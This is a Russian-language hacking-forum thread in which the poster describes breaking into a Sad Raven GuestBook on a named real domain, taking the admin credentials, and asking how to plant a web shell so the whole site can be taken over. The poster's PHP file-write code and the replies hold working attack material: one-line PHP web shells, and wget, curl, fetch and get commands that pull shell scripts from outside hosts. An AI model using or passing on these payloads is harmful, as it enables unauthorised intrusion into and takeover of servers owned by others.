Форум АНТИЧАТ - Взломать весь сайт через отдельный поддомен

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Взломать весь сайт через отдельный поддомен (https://forum.antichat.xyz/showthread.php?t=13761)

Взломать весь сайт через отдельный поддомен

Код:

<?

$open = fopen("/usr/local/psa/home/vhosts/sbmx.com.ru/subdomains/guest/httpdocs/script.php","w+");

        fwrite ($open,$_GET['fp']."\\n");

        fclose($open);

?>

Взломал Sad Raven GuestBook.
Получил пароль и логин админа.

Есть такая уязвимость там, что в дизайне сайта могут содержаться php-скрипты. Информация с http://xop0k.h15.ru/adv/3.txt

В общем пробовал загрузить туда маленький свой скриптик, который содержит форму загрузки файлов в себе.
Передаю то, что надо записывать через GET переменную fp.

Все бы было ок, да эта гостевуха экранирует слеши вот такие:

Код:

\

Как следствие нельзя записать в текстовой файл переменные в таком виде:

Код:

fwrite($fp, "\$text=\$_GET['fp']");

и это проблема. Не знаю как решить. Причем поставив один слеш при каждом сохранении они увеличиваются в геометрической прогрессии :))

Вот думаю как ещё можно загрузить файлик со своего компа на сервер. Загрузить хочу шелл, чтобы получить доступ ко всему сайту, т.к. гостевуха нахзодится на отдельном домене guest.site.ru, а сайт находится на site.ru

Абсолютные пути известны

пишешь
`wget http://kobeluga.narod.ru/rst.php`;
и у тебя загрузиться шелл в папку с гуестой =)
по идее не должны `` экранироваться

Если у тебя есть возможность создать файл тогда пиши <?php system($_GET[cmd]);?>
или <?php include($_GET[open]);?>
В первом случае у тебя уже шелл во втором ты его можеш проинклудить и после выполнить то что сказал киборг если же это фря в гета там может и не быть тогда
fetch -o shell.php http://freeshell.ru/myshell.txt курл и гет
curl -o shell.php http://freeshell.ru/myshell.txt
get -o shell.php http://freeshell.ru/myshell.txt